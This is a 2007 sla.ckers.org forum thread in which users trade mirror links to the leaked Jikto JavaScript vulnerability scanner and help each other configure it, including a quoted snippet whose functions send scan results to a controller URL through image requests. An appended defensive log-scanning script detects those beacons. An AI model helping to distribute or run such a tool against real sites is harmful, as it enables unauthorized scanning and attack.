
SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
jikto source code
Posted by: blad3 (IP Logged)
Date: April 01, 2007 07:04AM

Hi guys,

I was listening to the latest Security Now! (with Steve Gibson; hey, this guy has good intentions :P) and he mentioned the jikto source code being leaked out.
I would like to take a look. Does anybody have a copy?

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 01, 2007 08:27AM

Is this it? [www.pentest.it]

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 01, 2007 08:28AM

[www.pentest.it] other files

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: jikto source code
Posted by: .mario (IP Logged)
Date: April 01, 2007 02:11PM

damnit - down already. did you backup the files?

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Re: jikto source code
Posted by: Henaro (IP Logged)
Date: April 01, 2007 02:14PM

I'd like to see the source also. Anyone have it?

Re: jikto source code
Posted by: .mario (IP Logged)
Date: April 01, 2007 02:16PM

1st of april??

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 01, 2007 06:36PM

I have a backup; I thought they might take it down, seeing they were asking people to take it off their sites.

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 01, 2007 06:46PM

[URL REMOVED] Please look elsewhere

btw this is not an April Fools Joke. Tell me if the server is not responding. It's on my home server so kinda unreliable. Make a backup because I will take the server down after you check.

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/06/2007 01:04AM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: Awesome AnDrEw (IP Logged)
Date: April 01, 2007 08:10PM

Fukken Saved! I was wondering when the actual source would be available as it was supposed to be out around the 25th, and I knew they had already presented it to the public.

http://www.awesomeandrew.net/images/banner/88x317.gif
Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
[www.awesomeandrew.net]

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 01, 2007 09:39PM

Anyone else want a copy before I take it down?

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: jikto source code
Posted by: rsnake (IP Logged)
Date: April 01, 2007 11:32PM

Interesting how the jikto control was changed! Already being used by a number of people I see.

- RSnake
Gotta love it. http://ha.ckers.org

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 02, 2007 12:07AM

Taking my server down; anyone who wants a copy, PM me.

UPDATE: please read [sla.ckers.org]

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/06/2007 01:05AM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: blad3 (IP Logged)
Date: April 02, 2007 02:33AM

Here are the slides
[www.spidynamics.com]

Re: jikto source code
Posted by: busin3ss (IP Logged)
Date: April 02, 2007 01:43PM

Anyone playing with this tool? I need some guidance :)

Re: jikto source code
Posted by: blad3 (IP Logged)
Date: April 02, 2007 01:56PM

I did some tests. What problems do you have?

Re: jikto source code
Posted by: busin3ss (IP Logged)
Date: April 02, 2007 02:04PM

Well there are four files, I just coded a quick php file to replace control control.txt and changed the var GUIURL.

I'm trying without using a "proxy", I'm scanning a site in the same domain (To bypass the Same Origin Policy)... But I get these weird JavaScript errors

Is there any chance that I can see a working demo blad3? Just to see how you are testing

Re: jikto source code
Posted by: blad3 (IP Logged)
Date: April 02, 2007 02:14PM


Re: jikto source code
Posted by: busin3ss (IP Logged)
Date: April 02, 2007 02:37PM

Ryan Naraine Wrote:
-------------------------------------------------------
> The code has since been posted to the Sla.ckers.org forum.
> Hacker RSnake discusses snippets of the code, which can be
> used to hunt for common security holes and then connect
> back to its controller for instructions on which Web sites
> to hit and which flaws to look for.

Hahahaha...



Edited 1 time(s). Last edit at 04/02/2007 02:38PM by busin3ss.

Re: jikto source code
Posted by: blad3 (IP Logged)
Date: April 02, 2007 02:51PM

busin3ss, I'm testing on localhost like you did.
You are most definitely doing something wrong, maybe didn't use rot13 or entered some bad URL or path or ?
The script is working pretty nice, I'm watching the requests/responses with Firebug.
You can even insert breakpoints and debug the code if you want. Firebug rocks!

Re: jikto source code
Posted by: busin3ss (IP Logged)
Date: April 02, 2007 03:02PM

Downloading Firebug right now...

For those who want to download the source code (Since all mirrors are offline):

[busin3ss.name]



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by busin3ss.

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 02, 2007 03:03PM

>> wtf?
>> [blogs.zdnet.com]

oops

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: Acidus (IP Logged)
Date: April 02, 2007 03:38PM

You can run it against localhost sites to test. You'll need to edit the sendRequest() function. The global variable "prefix" holds the URL prefixing for the proxying site. The code in the isLinkgood() function should prevent Jikto from getting out of control and scanning pages that aren't on localhost

Re: jikto source code
Posted by: Delixe (IP Logged)
Date: April 02, 2007 04:52PM

Doesn't really do anything, I change the URL and nothing really occurs. Loads the site in an iframe and...nothing.

Re: jikto source code
Posted by: Beetlejuice (IP Logged)
Date: April 03, 2007 01:56PM

I missed the download window. Anyone has the whole lot available for me, pls?

Re: jikto source code
Posted by: .mario (IP Logged)
Date: April 03, 2007 04:15PM

For those with reading disabilities:
[busin3ss.name]

Greetings,
.mario

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>



Edited 1 time(s). Last edit at 04/03/2007 04:16PM by .mario.

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 05, 2007 11:50PM

Note to everyone who comes to this post PMing me I am not responding to PMs for Jikto source anymore. If you can't be smart and use Google to find mirrors or even bother to read the posts on this page which clearly provides a working link to a copy of Jikto then I will ignore you. Come on people do we need our hands held for everything?

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."



Edited 1 time(s). Last edit at 04/06/2007 01:06AM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: thrill (IP Logged)
Date: April 06, 2007 12:36AM

@CM

Edit the post? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: jikto source code
Posted by: busin3ss (IP Logged)
Date: April 06, 2007 01:01PM

Mirror of Jikto -> [busin3ss.name]

Re: jikto source code
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 06, 2007 01:37PM

Heh hopefully they know how to click a link. I mean the amount of people who PMed me even after you posted the link was ridiculous. Either they can't read or don't know how to use Google. I was asking myself this, if they can't even Google or read this page then how will they know how to use Jikto? I say someone make a post with links to known mirrors a sticky.

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: jikto source code
Posted by: Royal2000H (IP Logged)
Date: April 08, 2007 06:36AM

I got jikto and everything

I edited the jikto.js to direct to my control.txt

the-cloak banned me within seconds so im using google translate even though im testing pages in the same domain

with firebug i can see for example
[www.testdomainiamusing.com]

looking at the code in jikto.js:

function reportURL(method, url) {
    var i = new Image();
    i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);
}

function reportVuln(method, url, sev, title, req, resp) {
    var i = new Image();
    i.src = GUIURL + "2&url="

which means that unless I see "http://www.testdomainiamusing.com/jikto/control.txt2&url="
it did not find a vulnerability

i guess that's the way to do it without a controller, but someone above me said they wrote up a controller, can you post the source to the controller?

or maybe im using the tool incorrectly?
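
For defenders, the report requests described in the post above leave a recognizable shape in web server access logs. The following is an added example, not part of the thread and not Jikto code; the function names parseBeacon and scanAccessLog, the hosts and the log lines are constructed for illustration, and only the `1&url=...&method=...` and `2&url=` shapes come from the quoted snippet.

```javascript
// Added example: flag Jikto-style report beacons in web access logs.
// Pattern taken from the reportURL()/reportVuln() snippet quoted above:
//   GUIURL + "1&url=" + escape(url) + "&method=" + escape(method)
//   GUIURL + "2&url=" ...   (remaining parameters are not shown in the post)

// Report type digit, then url=, then (for type 1) method=.
const BEACON = /([12])&url=([^&\s]*)(?:&method=([^&\s]*))?/;

// escape() emits %XX and %uXXXX; decodeURIComponent() throws on the latter,
// so decode with the matching legacy unescape().
function parseBeacon(requestTarget) {
  const m = BEACON.exec(requestTarget);
  if (!m) return null;
  const url = unescape(m[2]);
  // Heuristic to cut false positives such as "?page=1&url=/home":
  // the reported value must be an absolute http(s) URL.
  if (!/^https?:\/\//i.test(url)) return null;
  // Type 1 always carries a method parameter in the quoted code.
  if (m[1] === "1" && m[3] === undefined) return null;
  const type = m[1] === "1" ? "url-crawled" : "vuln-reported";
  return { type, url, method: m[3] === undefined ? null : unescape(m[3]) };
}

// Pull the request target out of a common/combined log format line.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const req = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!req) continue;
    const report = parseBeacon(req[1]);
    if (report) hits.push({ client: line.split(" ")[0], ...report });
  }
  return hits;
}

// Constructed sample log lines (hosts and paths are placeholders).
const SAMPLE_LOG = [
  '192.0.2.10 - - [08/Apr/2007:06:30:01 +0000] "GET /jikto/control.txt1&url=http%3A//target.example/login.php&method=GET HTTP/1.1" 404 210',
  '192.0.2.10 - - [08/Apr/2007:06:30:04 +0000] "GET /jikto/control.txt2&url=http%3A//target.example/search.php%3Fq%3Dtest HTTP/1.1" 404 210',
  '198.51.100.7 - - [08/Apr/2007:06:31:00 +0000] "GET /list.php?page=1&url=/home HTTP/1.1" 200 5120',
  '198.51.100.7 - - [08/Apr/2007:06:31:09 +0000] "GET /index.html HTTP/1.1" 200 1043',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

The digit is appended to whatever GUIURL ends with, so the match is a heuristic; a burst of such requests from one client, each naming a different target URL, is the stronger signal.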


